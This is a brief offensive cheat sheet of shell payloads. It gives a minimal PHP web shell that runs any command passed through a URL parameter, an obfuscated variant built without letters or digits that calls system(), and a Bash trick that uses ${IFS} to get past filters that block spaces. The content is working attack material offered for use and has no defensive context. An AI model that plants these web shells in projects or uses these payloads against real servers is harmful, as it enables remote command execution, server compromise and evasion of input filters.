Exploit by shell
PHP webshell
- Beautiful: p0wny shell
- Shortest:
<?=`$_GET[1]`?> // .../shell.php?1=ls - Without a-zA-Z0-9:
<?=$_='$<>/'^'\{\{\{\{';${$_}[_](${$_}[__]); // .../shell.php?_=system&__=lsBash shell
- Without space separated:
cat${IFS%?}file.txt